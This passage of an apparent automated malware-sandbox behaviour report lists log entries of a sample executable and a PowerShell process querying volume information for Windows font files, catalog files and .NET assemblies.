                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
